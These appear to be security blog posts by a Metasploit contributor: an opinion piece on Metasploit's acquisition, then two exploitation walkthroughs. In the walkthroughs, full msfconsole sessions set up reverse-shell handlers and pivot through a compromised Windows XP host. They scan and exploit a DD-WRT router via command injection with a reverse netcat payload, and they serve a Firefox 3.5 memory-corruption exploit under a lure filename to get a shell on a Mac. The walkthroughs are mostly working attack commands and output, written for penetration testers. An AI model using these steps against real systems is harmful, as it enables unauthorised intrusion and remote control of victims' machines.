Let me start by saying that this are the opinions of a contributor. To this day I have contributed to the project 3 Auxiliary Modules and 16 Meterpreter scripts to the project and I had the honor and privilege to present with HD in Defcon 17 in the Metasploit Trac. I was initially in shock when I saw the news on my iPhone while stuck in traffic, when I saw the news I could not believe it, I thought it was a joke. When I got to my office I quickly checked the web pages and listen to the Risky Business Podcast where they interviewed about the acquisition and read all of the tweets of people in favor and against it, their worries, rants and comments. After all of this I mentioned,I came to the conclusion that this is a great thing for the project for a lot of time this project has been the labor of love of the members of the Metasploit project, with very few active committers and summiteers other than a handful, each putting of their own free time, sacrificing long nights, family time and money to work on the project. Some wrote code to scratch their own itch and solve problems they had others just did it for the same motivation that have pushed hackers everywhere to write code, the fun of creating something and learning how stuff works. In my case I stopped doing penetration tests and security audits many years ago and in December of last year decided to get back in to the game by sharing stuff in my blog, forums and turning a lot of the stuff I knew in to tools and scripts, in that process I started writing code for Metasploit and I never found in any other project a community so patient and willing to help. HD has given me tips that made me a better coder, he was always patient and cotius with me and other contributors, the members of the team have also always been helpful like Natron, ET, Chris Gates and MC with each piece of code I wrote (which many time was ugly as hell). HD is now a father and as a dad also of little girl I know how hard it is to spend time coding to contribute to a community and sacrifice the precious time one has with something as precious as ones own child, what he did will give him more time to spend with his family and still work on the project he loves as well as for some of the members of the Metasploit team. Here is a list of the advantages I see:

• Code will have dedicated dev team to work on it.
• More stable code base since more resources for testing will be available.
• More exploits and features to come faster since there will be a dedicated team.
• The side effect that other projects like Canvas, Core Impact and others will have a stronger competitor thus making them better their products even more.
• Support for pentester and others that use the framework.

The fears I have seen express by many have been:

• The code going private and closed source.
• That many of the cool features and exploits will be charged for by Rapid7
• That the community will disappear.

To this  I answer, HD has put long hours and money to fund this project by himself, he has expressed that he will continue to keep the project open source as well as support the community and to this I say he has more than earned our support and trust. I trust HD and keep him to his word. The project is under BSD license so the same community that has made Metasploit grow can fork it and keep it going, but for now my trust is on HD and the Dev team. So lets keep supporting the project by contributing, testing the code, reporting bugs and make this and even better framework. I do say I envy HD and Egyp7 from the team, they are now working full time on what they love so I say to them and the rest of the Metasploit team congratulations and my best wishes.

Special Thanks to Chris John Riley for getting me the video, the Pauldotcom Crew for their support and to HD for giving me the oportunity to present. I hope you guys enjoy it. My english was very bad it was a bit rushed since Adam Savage from Mythbusters took some time from the Metasploit track allocated time and we had to rush it a bit to be able to present all the material.

Defcon 17 Tactical Meterpreter Scripting from Carlos Perez on Vimeo.

My presentation and sample functions are in presentationsection of the website, take a look and let me know if you like it.

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the  HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it.  In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:

msf > ifconfig eth0
[*] exec: ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62  
          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0
          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)
          Interrupt:20 
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)
msf exploit(handler) > session -i 1
[-] Unknown command: session.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo 
Computer: AWINXP01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > execute -H -f -c -i -f cmd.exe
Process 1708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.111.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.111.2
C:\Documents and Settings\administrator\Desktop>exit
meterpreter > 

Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:

meterpreter > 
Background session 1? [y/N]  
msf exploit(handler) > 
msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table
====================
   Subnet             Netmask            Gateway    
   ------             -------            -------    
   192.168.111.0      255.255.255.0      Session 1  
msf exploit(handler) > 

Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > info
       Name: TCP Port Scanner
    Version: 6823
    License: Metasploit Framework License (BSD)
Provided by:
  hdm <hdm@metasploit.com>
  kris katterjohn <katterjohn@gmail.com>
Basic options:
  Name     Current Setting  Required  Description                                  
  ----     ---------------  --------  -----------                                  
  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)        
  RHOSTS                    yes       The target address range or CIDR identifier  
  THREADS  1                yes       The number of concurrent threads             
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds   
Description:
  Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443
PORTS => 22,23,80,443
msf auxiliary(tcp) > set RHOSTS 192.168.111.2
RHOSTS => 192.168.111.2
msf auxiliary(tcp) > run
[*]  TCP OPEN 192.168.111.2:22
[*]  TCP OPEN 192.168.111.2:23
[*]  TCP OPEN 192.168.111.2:80
[*] Auxiliary module execution completed
msf exploit(handler) >

Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:

msf exploit(handler) > connect -c 1 192.168.111.2 23
[*] Connected to 192.168.111.2:23
DD-WRT v24 std (c) 2007 NewMedia-NET GmbH
Release: 01/26/07 (SVN revision: 5660M)
�
DD-WRTx86CI login: ^Cmsf exploit(handler) > 
msf exploit(handler) > 

As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 2222
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2
RHOST => 192.168.111.2
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.

For more information on this vulnerability please check the following links:

http://www.securityfocus.com/bid/35742
http://www.milw0rm.com/exploits/9209

The exploit that was covered recently in an earlier blog post on the Firefox 3.5 escape () value memory corruption exploit that worked against Windows XP, this exploit has now been expanded to now cover OSX 10.5.7 and it has been improved so no script problem message is shown to the user requiring interaction by him. For use against an OSX target the attack might look something like this:

carlos@loki:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos: 
listening on [any] 80 ...
connect to [192.168.1.158] from carlos-perezs-computer.local [192.168.1.120] 58924
GET / HTTP/1.1
Host: 192.168.1.158
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
^C sent 0, rcvd 370

Here the target was trick initially to connect to a Netcat listener so we could look at the User Agent string to identify the target OS and Browser, this could have been also easily done creating a fake webpage and having the victim connect and look at the logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit, payload and setting the proper target:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >  show targets
Exploit targets:
   Id  Name                                      
   --  ----                                      
   0   Firefox 3.5.0 on Windows XP SP0-SP3       
   1   Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)  
msf exploit(firefox_escape_retval) > set TARGET 1
TARGET => 1
msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcp
PAYLOAD => osx/x86/vforkshell_reverse_tcp
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

As it can be seen the payload selected was the vforkshell and one of the main advantages of this shell is that since it uses the vfork() Unix call to spawn it self it does not run under the process exploited so when the target kills the hanged browser we do not loose our shell access. Since we launched the exploit as root we can change the port to listen for the exploit to port 80 making it easier to exploit a target behind a Proxy or Firewall, change the URI path to one less suspicious and launch the exploit:

msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.html
URIPATH => secretdocumets.html
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secretdocumets.html
[*]  Local IP: http://192.168.1.158:80/secretdocumets.html
[*] Server started.

Once the targets connects to our exploit it will launch the exploit javascript code with the payload:

[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.120:52760...
[*] Command shell session 1 opened (192.168.1.158:4444 -> 192.168.1.120:52770)

Once the shell is created we can interact with it, one important thing to remember is that environment variables set for the shell are the ones for the process exploited so we will have to use full path when calling certain commands:

msf exploit(firefox_escape_retval) > sessions -l
Active sessions
===============
  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell  192.168.1.158:4444 -> 192.168.1.120:52770  
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
id
uid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
uname -a
Darwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386
env
PWD=/sbin
SHLVL=1
_=/usr/bin/env
OLDPWD=/bin
/sbin/ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:9f:9e:11 
	media: autoselect status: inactive
	supported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> none
fw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030
	lladdr 00:17:f2:ff:fe:71:a7:b4 
	media: autoselect <full-duplex> status: inactive
	supported media: autoselect <full-duplex>
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6 
	inet 192.168.1.120 netmask 0xffffff00 broadcast 192.168.1.255
	ether 00:17:f2:99:d7:cf 
	media: autoselect status: active
	supported media: autoselect
en4: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:33:3e:50 
	media: autoselect status: inactive
	supported media: none autoselect 10baseT/UTP <half-duplex>
vmnet8: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.187.1 netmask 0xffffff00 broadcast 192.168.187.255
	ether 00:50:56:c0:00:08 
vmnet1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.38.1 netmask 0xffffff00 broadcast 192.168.38.255
	ether 00:50:56:c0:00:01 
exit
[*] Command shell session 1 closed.

This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.